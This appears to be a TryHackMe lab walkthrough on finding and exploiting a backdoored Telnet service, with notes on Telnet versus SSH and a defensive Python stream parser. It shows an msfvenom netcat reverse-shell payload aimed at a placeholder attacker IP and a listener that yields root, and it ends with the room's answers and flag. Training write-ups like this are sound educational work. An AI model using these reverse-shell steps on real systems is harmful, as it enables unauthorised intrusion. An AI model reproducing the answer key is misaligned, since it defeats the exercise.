This article is a deep dive into Telnet, covering enumeration, exploitation, penetration testing and the security concerns around this protocol. It is part of the CompTIA Pentest+ track on TryHackMe.

🔹 What is Telnet?

Telnet is an application-layer protocol used for remote command-line access to a server.

Everything transmitted over Telnet, credentials included, is sent in plain text, which leaves it open to interception and abuse.

It has largely been replaced by SSH because it offers no encryption at all.

🔹 Enumerating Telnet (Finding It on a Target System)

The video demonstrates using Nmap to scan for Telnet:

nmap -A -p- <target-ip>

  • The scan revealed port 8012 open, which is an unassigned port.
  • Further analysis showed a backdoor named “Skiddy”, indicating potential unauthorized access.

To manually test the port:

telnet <target-ip> 8012

If the connection is successful, the port is actively running Telnet.

๐Ÿ”น Exploiting Telnet

Step 1: Checking for Command Execution

Since the Telnet server didn’t display a help menu, the attacker tried executing a command:

.run ping <attacker-ip> -c 5

On the attacker’s side, they listened for ICMP (ping) requests:

tcpdump -i tun0 icmp

  • Receiving the pings confirmed command execution was possible.

Step 2: Gaining a Reverse Shell

To get full access to the system, they created a malicious payload:

msfvenom -p cmd/unix/reverse_netcat lhost=<attacker-ip> lport=4545 R

Then, they set up a Netcat listener:

nc -lvp 4545

Executing the payload through the Telnet session granted root access.

Packet Sniffing with tcpdump

We can also set up a listener with tcpdump to monitor ICMP (ping) traffic coming from the target machine.

The intercepted packets prove that commands sent over Telnet are transmitted in clear text, making them easy targets for attackers.

The attack is refined further by intercepting additional network traffic, showcasing the risks of unencrypted communications.
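Tying the enumeration and packet-sniffing points together, here is an added example (not code from the room, the video or the author) that takes a captured Telnet byte stream, decides whether it is Telnet from the option negotiation that precedes any banner (which is how a service on an odd port such as 8012 can be identified), and then shows what an on-path observer reads once the negotiation is stripped. The sample capture, port number and credentials are constructed.

```python
# Telnet stream inspector: added example, not code from the TryHackMe room.
# Two questions a defender asks when a service turns up on an odd port like 8012:
#   1. Is it Telnet?  Option negotiation (IAC 0xFF sequences) gives it away.
#   2. What could an on-path observer read?  Everything except the negotiation.
# The sample capture at the bottom is constructed for this example.
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
OPTIONS = {1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 24: "TERMINAL-TYPE", 31: "NAWS"}
CMD_NAMES = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}

def parse_stream(data: bytes):
    """Split raw Telnet bytes into (negotiations, cleartext): negotiations are
    strings like "WILL ECHO"; cleartext is what both sides typed and printed."""
    negotiations, text, i = [], bytearray(), 0
    while i < len(data):
        if data[i] != IAC:                     # ordinary data byte
            text.append(data[i]); i += 1; continue
        if i + 1 >= len(data):
            break                              # capture ends mid-command
        cmd = data[i + 1]
        if cmd == IAC:                         # IAC IAC is an escaped 0xFF
            text.append(IAC); i += 2
        elif cmd in CMD_NAMES and i + 2 < len(data):
            opt = data[i + 2]
            negotiations.append(f"{CMD_NAMES[cmd]} {OPTIONS.get(opt, opt)}")
            i += 3
        elif cmd == SB:                        # subnegotiation runs to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            if end == -1:
                break                          # truncated subnegotiation
            negotiations.append(f"SB {OPTIONS.get(data[i + 2], data[i + 2])}")
            i = end + 2
        else:                                  # NOP, GA, AYT ...: two bytes
            i += 2
    return negotiations, text.decode("latin-1")  # latin-1 keeps every byte

def is_telnet(data: bytes) -> bool:
    return bool(parse_stream(data)[0])

def audit(data: bytes, port: int) -> str:
    """One-line finding for a stream captured on `port`."""
    negotiations, text = parse_stream(data)
    if not negotiations:
        return f"port {port}: no Telnet negotiation seen"
    return (f"port {port}: Telnet ({', '.join(negotiations)}); "
            f"{len(text)} cleartext bytes readable")

# Constructed capture: server negotiates, greets and prompts; client logs in.
SAMPLE = (bytes([IAC, WILL, 1, IAC, DO, 3]) + b"SKIDY'S BACKDOOR.\r\nlogin: "
          + b"alice\r\n" + b"Password: " + b"s3cret-placeholder\r\n")
```

Running `audit(SAMPLE, 8012)` reports the negotiation that identifies the service as Telnet, and `parse_stream(SAMPLE)[1]` returns the whole login exchange, password included, exactly as a sniffer on the path would see it.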

Privilege Escalation Considerations

  • In real-world scenarios, attackers may not immediately obtain root privileges.
  • They typically start as a low-privileged user and then escalate privileges using known exploits or misconfigurations.
  • Common privilege escalation techniques include:
    • Exploiting SUID binaries
    • Finding misconfigured cron jobs
    • Searching for stored passwords in configuration files

Security Implications of Using Telnet

The instructor emphasizes the risks of using Telnet, including:

Lack of encryption – All data, including passwords, is transmitted in plaintext.

Susceptibility to MITM (Man-in-the-Middle) attacks – Attackers can easily intercept communication.

Backdoor access – As demonstrated, unsecured Telnet services can be hijacked by attackers.

To mitigate these risks, administrators should:

Disable Telnet and use SSH instead.

Enforce strong authentication mechanisms.

Use firewalls to block unnecessary services.

How SSH Replaced Telnet

Telnet’s biggest flaw is that it transmits data in plain text. This means:

Usernames & passwords are unencrypted → Anyone on the network can intercept and steal credentials.
Commands are visible → Hackers can see everything being typed.
Man-in-the-middle (MITM) attacks → Attackers can alter commands before they reach the server.

This made Telnet an easy target for sniffing attacks, where hackers capture network traffic to extract credentials.

🔹 SSH: The Secure Alternative

SSH (Secure Shell) was introduced in 1995 to fix these security issues.

✅ Encrypts all communication using strong cryptographic algorithms.
✅ Uses public-key authentication (optional) instead of just passwords.
✅ Protects against MITM attacks by verifying the server’s identity.
✅ Supports tunneling for secure file transfers (e.g., SCP, SFTP).

Example of an SSH login:

ssh user@remote-server.com

This is much safer than:

telnet remote-server.com

🔹 How SSH Works (Simplified)

1️⃣ Handshake: The client and server exchange encryption keys.
2️⃣ Authentication: The user logs in using a password or an SSH key.
3️⃣ Encrypted Session: All commands and data are securely transmitted.

With Telnet, everything is exposed. With SSH, everything is protected.

TryHackMe Networking Core Protocols | Room Answers

Okay, let’s try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.

No answer needed

Great! It’s an open telnet connection! What welcome message do we receive?

SKIDY’S BACKDOOR.

Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

N

Hmm… that’s strange. Let’s check to see if what we’re typing is being executed as a system command.

No answer needed

Start a tcpdump listener on your local machine.

If using your own machine with the OpenVPN connection, use:

sudo tcpdump ip proto \icmp -i tun0

If using the AttackBox, use:

sudo tcpdump ip proto \icmp -i ens5

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

No answer needed

Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

Y

Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let’s have some fun!

No answer needed

We’re going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us. Here’s our syntax:

“msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R”

-p = payload
lhost = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

What word does the generated payload start with?

mkfifo

Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

“nc -lvnp [listening port]”

What would the command look like for the listening port we selected in our payload?

nc -lvnp 4444

Great! Now that that’s running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully, this will give us a shell on the target machine!

No answer needed

Success! What is the contents of flag.txt?

THM{y0u_g0t_th3_t3ln3t_fl4g}

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.